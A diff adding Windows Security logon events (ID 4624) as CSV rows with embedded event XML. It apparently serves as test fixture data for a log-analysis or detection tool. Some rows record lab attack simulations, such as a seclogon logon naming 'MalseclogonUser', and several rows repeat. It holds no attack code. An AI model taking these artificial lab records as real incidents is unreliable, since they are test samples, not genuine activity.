+    <EventRecordID>65969</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""612"" ThreadID=""1884"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>ICORP-DC.internal.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-2895268558-4179327395-2773671012-1108</Data>
+    <Data Name=""TargetUserName"">EXCHANGE$</Data>
+    <Data Name=""TargetDomainName"">ICORP</Data>
+    <Data Name=""TargetLogonId"">0x24daa6</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">EXCHANGE</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.111.87</Data>
+    <Data Name=""IpPort"">58128</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-02T09:16:58.787262Z"">
+    </TimeCreated>
+    <EventRecordID>65967</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""612"" ThreadID=""1884"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>ICORP-DC.internal.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">ICORP-DC$</Data>
+    <Data Name=""TargetDomainName"">INTERNAL.CORP</Data>
+    <Data Name=""TargetLogonId"">0x24c879</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">94BA67EA-8490-3C86-6DB7-DF74C9AA4449</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">50151</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-05T09:39:30.697730Z"">
+    </TimeCreated>
+    <EventRecordID>10113</EventRecordID>
+    <Correlation ActivityID=""FDC063DE-4B69-0000-5564-C0FD694BD501"">
+    </Correlation>
+    <Execution ProcessID=""620"" ThreadID=""5596"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x2e4ce</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x38f87e</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1b90</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">l</Data>
+    <Data Name=""TargetOutboundDomainName"">o</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.616154Z"">
+    </TimeCreated>
+    <EventRecordID>329918</EventRecordID>
+    <Correlation ActivityID=""B04CB785-EBD3-0000-16B8-4CB0D3EBD701"">
+    </Correlation>
+    <Execution ProcessID=""636"" ThreadID=""7156"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1bc4</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">MalseclogonUser</Data>
+    <Data Name=""TargetOutboundDomainName"">MalseclogonDomain</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:42:00.800072Z"">
+    </TimeCreated>
+    <EventRecordID>21373</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""9984"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x82215a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63652</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:41:54.272334Z"">
+    </TimeCreated>
+    <EventRecordID>21371</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""740"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x821f28</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63652</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:41:47.653255Z"">
+    </TimeCreated>
+    <EventRecordID>21369</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""740"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x821aab</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63652</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:41:37.642369Z"">
+    </TimeCreated>
+    <EventRecordID>21367</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""10224"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x820d61</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63640</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-02T09:17:23.206182Z"">
+    </TimeCreated>
+    <EventRecordID>65971</EventRecordID>
+    <Correlation ActivityID=""E7B51CDE-BAD3-0000-481F-B5E7D3BAD401"">
+    </Correlation>
+    <Execution ProcessID=""612"" ThreadID=""1280"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>ICORP-DC.internal.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">ICORP-DC$</Data>
+    <Data Name=""TargetDomainName"">INTERNAL.CORP</Data>
+    <Data Name=""TargetLogonId"">0x24db24</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50152</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-02T09:17:22.563018Z"">
+    </TimeCreated>
+    <EventRecordID>65969</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""612"" ThreadID=""1884"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>ICORP-DC.internal.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-2895268558-4179327395-2773671012-1108</Data>
+    <Data Name=""TargetUserName"">EXCHANGE$</Data>
+    <Data Name=""TargetDomainName"">ICORP</Data>
+    <Data Name=""TargetLogonId"">0x24daa6</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">EXCHANGE</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.111.87</Data>
+    <Data Name=""IpPort"">58128</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-02T09:16:58.787262Z"">
+    </TimeCreated>
+    <EventRecordID>65967</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""612"" ThreadID=""1884"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>ICORP-DC.internal.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">ICORP-DC$</Data>
+    <Data Name=""TargetDomainName"">INTERNAL.CORP</Data>
+    <Data Name=""TargetLogonId"">0x24c879</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">94BA67EA-8490-3C86-6DB7-DF74C9AA4449</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">50151</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-05T09:39:30.697730Z"">
+    </TimeCreated>
+    <EventRecordID>10113</EventRecordID>
+    <Correlation ActivityID=""FDC063DE-4B69-0000-5564-C0FD694BD501"">
+    </Correlation>
+    <Execution ProcessID=""620"" ThreadID=""5596"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x2e4ce</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x38f87e</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1b90</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
